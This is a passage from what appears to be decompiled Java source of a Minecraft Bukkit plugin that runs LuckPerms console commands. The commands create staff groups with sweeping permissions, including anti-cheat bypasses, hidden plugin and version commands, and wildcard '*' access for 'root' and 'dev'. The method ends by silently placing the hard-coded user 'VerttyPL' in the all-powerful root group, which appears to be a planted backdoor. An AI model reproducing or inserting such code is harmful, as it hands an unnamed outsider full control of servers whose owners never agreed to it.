        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.paczka");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.backup");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.create.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set tools.chat.link");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.sejf");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.guildadmin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.rename");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.stats");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set dark");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set nocheatplus.shortcut.info");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set nocheatplus.shortcut.monitor");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set nocheatplus.shortcut.safeadmin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set nocheatplus.shortcut.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set nocheatplus.checks");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.nomute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup ha");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.inv");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set tools.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set tools.cmd.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.nomute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.heal");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.tp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.kick");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.god");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.fly");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.helpop.view");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set verus.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.tp.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set niesienie.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.vanish");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.repairall");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.helpop.view");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.sprawdzanie.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.combat.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.enderchest.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.chat");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.ban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.mute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.vanish.see");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.inv");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.unban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.heal");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.mod");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set CustomEnderChest.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set CustomEnderChest.commands");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.unmute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.ce");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.socialspy");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.list");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.ha");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.tell.nomsg");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.give");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.gamemode");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.enchant");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.day");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.noc");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.clear");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.slowmode");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.i");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.cichyban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.cichyunban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.speed");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.bc");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.paczka");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.backup");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.create.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set tools.chat.link");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.guildadmin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.rename");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.stats");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.slot");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.aevent");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.cheater");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.auto");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.border");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.stats");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.sejf");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set dark");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set nocheatplus.shortcut.info");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set nocheatplus.shortcut.monitor");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set nocheatplus.shortcut.safeadmin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set nocheatplus.shortcut.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set minelogin.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set nocheatplus.checks");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set core.cmd.vanishplus");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group ha permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup root");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set *");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set minelogin.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set niesienie.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group root permission set dark");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup dev");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group dev permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group dev permission set admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group dev permission set *");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group dev permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group dev permission set minelogin.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group dev permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group dev permission set dark");
        return Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp user VerttyPL parent set root");
        
    }
}
